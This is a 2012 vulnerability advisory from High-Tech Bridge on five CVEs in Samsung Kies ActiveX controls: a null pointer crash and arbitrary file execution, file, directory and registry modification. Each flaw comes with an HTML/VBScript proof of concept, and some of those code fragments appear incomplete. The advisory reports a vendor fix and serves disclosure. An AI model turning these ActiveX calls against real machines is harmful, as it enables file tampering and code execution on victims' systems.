Samsung Kies – Multiple Vulnerabilities

  • 作者: High-Tech Bridge SA
    日期: 2012-10-16
  • 类别:
  • 来源:
  • Advisory ID: HTB23099
    Product: Samsung Kies
    Vendor: Samsung Electronics
    Vulnerable Version(s): and probably prior
    Tested Version:
    Vendor Notification: June 25, 2012 
    Public Disclosure: October 15, 2012 
    Vulnerability Type: NULL Pointer Dereference [CWE-476], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284], Improper Access Control [CWE-284]
    CVE References: CVE-2012-3806, CVE-2012-3807, CVE-2012-3808, CVE-2012-3809, CVE-2012-3810
    CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P), 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P),5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
    Solution Status: Fixed by Vendor
    Risk Level: Medium 
    Discovered and Provided: High-Tech Bridge Security Research Lab ( ) 
    Advisory Details:
    High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in Samsung Kies synchronization utility that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user. 
    1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806
    The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID {7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\"). A remote attacker can pass "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and rise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX is previously zeroed by an unexpected NULL value in the memory region pointed by ECX:
    2A22B95 MOV ECX,[EBP+10]
    2A22B98 MOV EAX,[ECX]
    2A22B9AMOV EDX,[EAX]//Crash through
    Null Pointer Dereference
    2A22B9CPUSH 0
    2A22B9E PUSH 0
    2A22BA0PUSH 2A71E68
    2A22BA6MOV EAX,[EDX+50]
    EIP 02A22B9A
    EAX 00000000
    EBX 02A66774 -> 029E58F0
    ECX 0022EBC0 -> 00000000
    EDX 006DFCE2 -> 00030000
    EDI 00000000
    ESI 00000000
    EBP 0022EB5C -> 0022EB7C
    ESP 0022EB38 -> F2D508FE
    The following Proof of Concept code causes a browser to crash:
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
     <title>Multiple vulnerabilities in Samsung Kies v.</title>
     <script language='vbscript'>
     Sub daPoC()
     daTarget.GetDataTable arg1
     End Sub
     <h3>Multiple vulnerabilities in Samsung Kies v.</h3>
     <h4>Null Pointer Dereference PoC</h4>
     This simple PoC will crash Internet Explorer.<BR><BR>
     <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
     <object classid='clsid:7650BC47-036D-4D5B-95B4-9D622C8D00A4'
    2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807
    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
    Arbitrary File Execution:
    Run=> Vulnerable
    RunAt=> Initial Exploit Test failed
    RunAtNotExit => Initial Exploit Test failed
    RunNotExit => Vulnerable
    Arbitrary File Execution Proof of Concept:
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
     <title>Multiple vulnerabilities in Samsung Kies v.</title>
     <script language='vbscript'>
     Sub daPoC()
     daTarget.Run daFile
     End Sub
     <h3>Multiple vulnerabilities in Samsung Kies v.</h3>
     <h4>Arbitrary File Execution PoC</h4>
     This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR>
     <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
     <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
    3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808
    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
    Arbitrary File Modification:
    FileCopy => Vulnerable
    FileCopySync => Vulnerable
    FileDelete => Vulnerable
    FileMove => Vulnerable
    FileMoveExReboot => Initial Exploit Test failed
    FileMoveSync => Vulnerable
    Arbitrary File Modification Proof of Concept:
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
     <title>Multiple vulnerabilities in Samsung Kies v.</title>
     <script language='vbscript'>
     Set daShell = CreateObject( "WScript.Shell" )
     daFileCopySource=daRoot & "\System32\drivers\etc\hosts" daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
     daFileCopyDest=daprofile & "\Desktop\hosts"
     daFileMoveDest=daprofile & "\Desktop\hosts.backup"
     Sub daPoC()
     daTarget.FileCopy daFileCopySource, daFileCopyDest
     End Sub
     Sub daPoC2()
     daTarget.FileMoveSync daFileCopyDest, daFileMoveDest
     End Sub
     Sub daPoC3()
     daTarget.FileDelete daFileMoveDest
     End Sub
     <h3>Multiple vulnerabilities in Samsung Kies v.</h3>
     <h4>Arbitrary File Modification PoC</h4>
     This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script> file into your desktop.<BR><BR>
    <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
     This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script> file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
     <input language=VBScript onclick=daPoC2() type=button value="Proof
    of Concept">
     This simple PoC will delete <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
     <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept">
     <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
    4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809
    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
    Arbitrary Directory Modification:
    DirCreate=> Vulnerable
    DirDelete=> Vulnerable
    Arbitrary Directory Modification Proof of Concept:
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
     <title>Multiple vulnerabilities in Samsung Kies v.</title>
     <script language='vbscript'>
     Set daShell = CreateObject( "WScript.Shell" )
     daDir=daprofile & "\Desktop\FRoGito"
     Sub daPoC()
     daTarget.DirCreate daDir
     End Sub
     Sub daPoC2()
     daTarget.DirDelete daDir
     End Sub
     <h3>Multiple vulnerabilities in Samsung Kies v.</h3>
     <h4>Arbitrary Directory Modification PoC</h4>
     This simple PoC will create the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>
     <input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
     This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR>
     <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
     <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
    5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810
    The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
    Arbitrary Registry Modification:
    RegiCreateKey=> Vulnerable
    RegiDeleteKey=> Vulnerable
    RegiDeleteTree => Vulnerable
    RegiDeleteValue=> Vulnerable
    RegiSetValueInt=> Vulnerable
    RegiSetValueInt64=> Vulnerable
    RegiSetValueString => Vulnerable
    RegiSetValueString64 => Vulnerable
    Arbitrary Registry Modification Proof of Concept:
    <!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
     <title>Multiple vulnerabilities in Samsung Kies v.</title>
     <script language="vbscript">
    daReg = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito" 
    daValueStrName = "PoC_str"
    daValueStr = ""
    daValueIntName = "PoC_int"
    daValueInt = 8080
    Sub daPoC()
    daTarget.RegiCreateKey daReg
    End Sub
    Sub daPoC2()
    daTarget.RegiSetValueString daReg, daValueStrName, daValueStr
    End Sub
    Sub daPoC3()
    daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt
    End Sub
    Sub daPoC4()
    daTarget.RegiDeleteValue daReg, daValueStrName
    daTarget.RegiDeleteValue daReg, daValueIntName
    End Sub
    Sub daPoC5()
    daTarget.RegiDeleteKey daReg
    End Sub
     <h3>Multiple vulnerabilities in Samsung Kies v.</h3>
     <h4>Arbitrary Registry Modification PoC</h4>
     This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
    registry key.<BR><BR>
     <input language=VBScript onclick=daPoC() type=button value="Proof
    of Concept">
    This simple PoC will create the string value 'PoC_str' initialized to '' in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR>
     <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
     This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
    registry key.
     <input language=VBScript onclick=daPoC3() type=button
    value="Proof of Concept">
     This simple PoC will delete both string and hex values from the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key
     <input language=VBScript onclick=daPoC4() type=button value="Proof of Concept"> 
     This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key.
     <input language=VBScript onclick=daPoC5() type=button value="Proof of Concept">
     <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1'
    Upgrade to KIES v2.5.0.12094_27_11
    [1] High-Tech Bridge Advisory HTB23099 - - Multiple vulnerabilities in Samsung Kies.
    [2] Samsung Kies - - Samsung Kies is a freeware software application used to communicate between Windows or Macintosh computers, and more recently-manufactured Samsung mobile phone and tablet computer devices. Kies is Samsung's official tool for Android based devices which allows synchronization and multimedia files management.
    [3] Common Vulnerabilities and Exposures (CVE) - - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
    [4] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
    Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.